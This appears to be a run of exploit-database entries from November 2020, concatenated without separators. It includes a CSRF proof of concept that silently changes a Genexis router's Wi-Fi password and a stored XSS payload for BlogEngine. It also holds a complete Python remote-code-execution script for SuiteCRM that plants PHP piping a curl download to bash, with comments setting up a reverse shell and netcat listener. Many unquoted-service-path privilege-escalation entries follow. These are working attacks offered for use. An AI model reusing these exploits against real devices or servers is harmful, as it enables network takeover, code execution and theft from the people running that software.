# Vendor Homepage: https://www.gxgroup.eu/ont-products/
# Exploit Author: Jinson Varghese Behanan (@JinsonCyberSec)
# Author Advisory: https://www.getastra.com/blog/911/csrf-broken-access-control-in-genexis-platinum-4410/
# Version: v2.1 (software version P4410-V2-1.28)
# CVE : CVE-2020-25015
1. Description
Platinum 4410 is a compact router from Genexis that is commonly used at homes and offices. Hardware version V2.1 – Software version P4410-V2-1.28 was found to be vulnerable to Broken Access Control and CSRF which could be combined to remotely change the WIFI access point’s password.
2. Impact
An attacker can send the victim a link, which if he clicks while he is connected to the WiFi network established from the vulnerable router, the password of the WIFI access point will get changed via CSRF exploit. As the router is also vulnerable to Broken Access Control, the victim does not need to be logged in to the router’s web-based setup page (192.168.1.1), essentially making this a one-click hack.
3. Proof of Concept
Create an HTML file with the following code:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.1.1/cgi-bin/net-wlan.asp" method="POST">
<input type="hidden" name="wlEnbl" value="ON" />
<input type="hidden" name="hwlKeys0" value="" />
<input type="hidden" name="hwlKeys1" value="" />
<input type="hidden" name="hwlKeys2" value="" />
<input type="hidden" name="hwlKeys3" value="" />
<input type="hidden" name="hwlgMode" value="9" />
<input type="hidden" name="hwlAuthMode" value="WPAPSKWPA2PSK" />
<input type="hidden" name="hwlEnbl" value="1" />
<input type="hidden" name="hWPSMode" value="1" />
<input type="hidden" name="henableSsid" value="1" />
<input type="hidden" name="hwlHide" value="0" />
<input type="hidden" name="isInWPSing" value="0" />
<input type="hidden" name="WpsConfModeAll" value="7" />
<input type="hidden" name="WpsConfModeNone" value="0" />
<input type="hidden" name="hWpsStart" value="0" />
<input type="hidden" name="isCUCSupport" value="0" />
<input type="hidden" name="SSIDPre" value="N/A" />
<input type="hidden" name="bwControlhidden" value="0" />
<input type="hidden" name="ht_bw" value="1" />
<input type="hidden" name="wlgMode" value="b,g,n" />
<input type="hidden" name="wlChannel" value="0" />
<input type="hidden" name="wlTxPwr" value="1" />
<input type="hidden" name="wlSsidIdx" value="0" />
<input type="hidden" name="SSID_Flag" value="0" />
<input type="hidden" name="wlSsid" value="JINSON" />
<input type="hidden" name="wlMcs" value="33" />
<input type="hidden" name="bwControl" value="1" />
<input type="hidden" name="giControl" value="1" />
<input type="hidden" name="enableSsid" value="on" />
<input type="hidden" name="wlAssociateNum" value="32" />
<input type="hidden" name="wlSecurMode" value="WPAand11i" />
<input type="hidden" name="wlPreauth" value="off" />
<input type="hidden" name="wlNetReauth" value="1" />
<input type="hidden" name="wlWpaPsk" value="NEWPASSWORD" />
<input type="hidden" name="cb_enablshowpsw" value="on" />
<input type="hidden" name="wlWpaGtkRekey" value="" />
<input type="hidden" name="wlRadiusIPAddr" value="" />
<input type="hidden" name="wlRadiusPort" value="" />
<input type="hidden" name="wlRadiusKey" value="" />
<input type="hidden" name="wlWpa" value="TKIPAES" />
<input type="hidden" name="wlKeyBit" value="64" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="wlKeys" value="" />
<input type="hidden" name="WpsActive" value="0" />
<input type="hidden" name="wpsmode" value="ap-pbc" />
<input type="hidden" name="pinvalue" value="" />
<input type="hidden" name="Save_Flag" value="1" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Open this file in a browser while you are connected to the WIFI. There is no need for the victim to be logged in to the Router admin panel (192.168.1.1). It can be seen that the WIFI connection is dropped. To reconnect, forget the WIFI connection on your laptop or phone and connect using the newly changed password: NEWPASSWORD
4. PoC Video: https://www.youtube.com/watch?v=nSu5ANDH2Rk&feature=emb_title
3. Timeline
Vulnerability reported to the Genexis team – August 28, 2020
Team confirmed firmware release containing fix – September 14, 2020
# Exploit Title: BlogEngine 3.3.8 - 'Content' Stored XSS
# Date: 11/2020
# Exploit Author: Andrey Stoykov
# Vendor Homepage: https://blogengine.io/
# Software Link: https://github.com/BlogEngine/BlogEngine.NET/releases/download/v3.3.8.0/3380.zip
# Version: 3.3.8
# Tested on: Windows Server 2016
# Exploit and Detailed Info: https://infosecresearchlab.blogspot.com/2020/11/blogengine-338-stored-xss.html
Stored XSS Reproduction Steps:
1. Login http://IP/blogengine/admin/app/editor/editpost.cshtml
2. Add content and trap POST request into intercepting proxy
3. Add the XSS payload into the "Content" parameter value
4. Browse to the post to trigger the XSS payload
Example HTTP POST Request:
POST /blogengine/api/posts HTTP/1.1
Host: 192.168.56.6
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
[..]
{
"Id": "",
"Title": "XSS Test",
"Author": "Admin",
"Content": "<img src=x onerror=alert(`XSS`)>",
[..]
}
Example HTTP Response:
HTTP/1.1 201 Created
Cache-Control: no-cache
[..]
{
"IsChecked": false,
"Id": "357ae13d-f230-486a-b2aa-71d67a700083",
"Title": "XSS Test",
"Author": "Admin",
"Description": "",
"Content": "<img src=x onerror=alert(`XSS`)>",
[..]
}
# Exploit Title: HP Display Assistant x64 Edition 3.20 - 'DTSRVC' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.portrait.com/
# Software Link: https://www.portrait.com/dtune/hwp/enu/
# Software Version: 3.20
# File Version: 1.0.0.1
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%DTSRVC%"' get name, displayname, pathname, startmode, startname
DisplayName Name PathName StartMode StartName
Portrait Displays Display Tune Service DTSRVC C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "DTSRVC"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DTSRVC
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common Files\Portrait Displays\Shared\dtsrvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Portrait Displays Display Tune Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.
# Exploit Title: SuiteCRM 7.11.15 - 'last_name' Remote Code Execution (Authenticated)
# Date: 08 NOV 2020
# Exploit Author: M. Cory Billington (@_th3y)
# Vendor Homepage: https://suitecrm.com/
# Software Link: https://github.com/salesagility/SuiteCRM
# Version: 7.11.15 and below
# Tested on: Ubuntu 20.04 LTS
# CVE: CVE-2020-28328
# Writeup: https://github.com/mcorybillington/SuiteCRM-RCE
from requests import Session
from random import choice
from string import ascii_lowercase
url = "http://127.0.0.1/" # URL to remote host web root
post_url = "{url}index.php".format(url=url)
user_name = "admin" # User must be an administrator
password = "admin"
prefix = 'shell-'
file_name = '{prefix}{rand}.php'.format(
prefix=prefix,
rand=''.join(choice(ascii_lowercase) for _ in range(6))
)
# *Recommend K.I.S.S as some characters are escaped*
# Example for reverse shell:
# Put 'bash -c '(bash -i >& /dev/tcp/127.0.0.1/8080 0>&1)&' inside a file named shell.sh
# Stand up a python web server `python -m http.server 80` hosting shell.sh
# Set a nc listener to catch the shell 'nc -nlvp 8080'
command = '<?php `curl -s http://127.0.0.1/shell.sh | bash`; ?>'.format(fname=file_name)
# Admin login payload
login_data = {
"module": "Users",
"action": "Authenticate",
"return_module": "Users",
"return_action": "Login",
"user_name": user_name,
"username_password": password,
"Login": "Log+In"
}
# Payload to set logging to 'info' and create a log file in php format.
modify_system_settings_data = {
"action": (None, "SaveConfig"),
"module": (None, "Configurator"),
"logger_file_name": (None, file_name), # Set file extension in the file name as it isn't checked here
"logger_file_ext": (None, ''), # Bypasses file extension check by just not setting one.
"logger_level": (None, "info"), # This is important for your php code to make it into the logs
"save": (None, "Save")
}
# Payload to put php code into the malicious log file
poison_log = {
"module": (None, "Users"),
"record": (None, "1"),
"action": (None, "Save"),
"page": (None, "EditView"),
"return_action": (None, "DetailView"),
"user_name": (None, user_name),
"last_name": (None, command),
}
# Payload to restore the log file settings to default after the exploit runs
restore_log = {
"action": (None, "SaveConfig"),
"module": (None, "Configurator"),
"logger_file_name": (None, "suitecrm"), # Default log file name
"logger_file_ext": (None, ".log"), # Default log file extension
"logger_level": (None, "fatal"), # Default log file setting
"save": (None, "Save")
}
# Start of exploit
with Session() as s:
# Authenticating as the administrator
s.get(post_url, params={'module': 'Users', 'action': 'Login'})
print('[+] Got initial PHPSESSID:', s.cookies.get_dict()['PHPSESSID'])
s.post(post_url, data=login_data)
if 'ck_login_id_20' not in s.cookies.get_dict().keys():
print('[-] Invalid password for: {user}'.format(user=user_name))
exit(1)
print('[+] Authenticated as: {user}. PHPSESSID: {cookie}'.format(
user=user_name,
cookie=s.cookies.get_dict()['PHPSESSID'])
)
# Modify the system settings to set logging to 'info' and create a log file in php format
print('[+] Modifying log level and log file name.')
print('[+] File name will be: {fname}'.format(fname=file_name))
settings_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
s.post(post_url, headers=settings_header, files=modify_system_settings_data)
# Post to update the administrator's last name with php code that will poison the log file
print('[+] Poisoning log file with php code: {cmd}'.format(cmd=command))
command_header = {'Referer': '{url}?module=Configurator&action=EditView'.format(url=url)}
s.post(url, headers=command_header, files=poison_log)
# May be a good idea to put a short delay in here to allow your code to make it into the logfile.
# Up to you though...
# Do a get request to trigger php code execution.
print('[+] Executing code. Sending GET request to: {url}{fname}'.format(url=url, fname=file_name))
execute_command = s.get('{url}/{fname}'.format(url=url, fname=file_name), timeout=1)
if not execute_command.ok:
print('[-] Exploit failed, sorry... Might have to do some modifications.')
# Restoring log file to default
print('[+] Setting log back to defaults')
s.post(post_url, headers=settings_header, files=restore_log)
print('[+] Done. Clean up {fname} if you care...'.format(fname=file_name))
#Exploit Title: Winstep 18.06.0096 - 'Xtreme Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Winstep
#Version : WsxService 18.06.0096
#Vendor Homepage : https://www.winstep.net/xtreme.asp
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc "Winstep Xtreme Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Winstep Xtreme Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Winstep\WsxService
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Winstep Xtreme Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit Title: KMSpico 17.1.0.0 - 'Service KMSELDI' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : KMSpico
#Version : Service_KMS 17.1.0.0
#Vendor Homepage : https://official-kmspico.com/
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\>sc qc "Service KMSELDI"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: Service KMSELDI
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\KMSpico\Service_KMS.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Service KMSELDI
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Exploit Title: OKI sPSV Port Manager 1.0.41 - 'sPSVOpLclSrv' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.oki.com/
# Software Link: https://www.oki.com/mx/printing/download/sPSV_010041_2_270910.exe
# Software Version: 1.0.41
# File Version: 1.4.2.0
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%sPSVOpLclSrv%"' get displayname, pathname, startmode, startname
DisplayName PathName StartMode StartName
OKI sPSV Port Manager C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "sPSVOpLclSrv"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: sPSVOpLclSrv
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Okidata\smart PrintSuperVision\xml\ComApi\extend3\portmgrsrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : OKI sPSV Port Manager
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.
#Exploit Title: IPTInstaller 4.0.9 - 'PassThru Service' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : HTC
#Version : IPTInstaller 4.0.9
#Vendor Homepage : https://www.htc.com/latam/
#Tested on OS: Windows 7 Pro
#Analyze PoC :
==============
C:\Users\DSAZ230>sc qc "PassThru Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: PassThru Service
TIPO : 10
[image: PassThruserv.jpg]
WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\HTC\Internet
Pass-Through\PassThruSvr.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Internet Pass-Through Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit Title: DigitalPersona 4.5.0.2213 - 'DpHostW' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : DigitalPersona U. are U. One Touch
#Version : DigitalPersona Pro 4.5.0.2213
#Vendor Homepage : https://www.hidglobal.com/crossmatch
#Tested on OS: Windows 10 Home
#Analyze PoC :
==============
C:\>sc qc DpHost
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: DpHost
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files
(x86)\DigitalPersona\Bin\DpHostW.exe
GRUPO_ORDEN_CARGA : BiometricGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : Servicio de autenticación biométrica
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit Title: Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path
Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2020-11-08
#Vendor : Genexus
#Version : Genexus Protection Server 9.6.4.2
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage : https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro
#Analyze PoC :
==============
C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: protsrvservice
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Common
Files\Artech\GXProt1\ProtSrv.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : ProtSrvService
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
#Exploit Title: HP WMI Service 1.4.8.0 - 'HPWMISVC.exe' Unquoted Service Path
#Discovery by: Jocelyn Arenas
#Discovery Date: 2020-11-07
#Vendor Homepage: https://www8.hp.com/mx/es/home.html
#Tested Version: 1.4.8.0
#Vulnerability Type: Unquoted Service Path
#Tested on OS: Windows 10 Home x64 es
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\windows\\" | findstr /i /v """
HPWMISVC HPWMISVC c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe Auto
#Service info:
C:\>sc qc HPWMISVC
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME : HPWMISVC
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HPWMISVC
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
#Exploit:
A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security
applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with
the elevated privileges of the application.
# Exploit Title: Syncplify.me Server! 5.0.37 - 'SMWebRestServicev5' Unquoted Service Path
# Date: 2020-11-08
# Exploit Author: Julio Aviña
# Vendor Homepage: https://www.syncplify.me/
# Software Link: https://download.syncplify.me/SMServer_Setup.exe
# Version: 5.0.37
# Tested on: Windows 10 Pro x64 es
# Vulnerability Type: Unquoted Service Path
# 1. To find the unquoted service path vulnerability
C:\>wmic service where 'name like "%SMWebRestServicev5%"' get displayname, pathname, startmode, startname
DisplayName PathName StartMode StartName
Syncplify.me Web/REST Server! v5 C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe Auto LocalSystem
# 2. To check service info:
C:\>sc qc "SMWebRestServicev5"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: SMWebRestServicev5
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Syncplify\Syncplify.me Server!\SMWebRestSvc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Syncplify.me Web/REST Server! v5
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# 3. Exploit:
A successful attempt to exploit this vulnerability requires the attacker to insert an executable file into the service path undetected by the OS or some security application.
When restarting the service or the system, the inserted executable will run with elevated privileges.